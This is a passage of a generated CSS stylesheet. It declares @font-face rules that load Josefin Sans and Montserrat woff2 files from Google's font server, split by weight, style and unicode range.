U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUAnx4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUA3x4Vn8siqM7.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3aZQNVED7rKGKxtqIqX5EUDXx4Vn8sig.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: 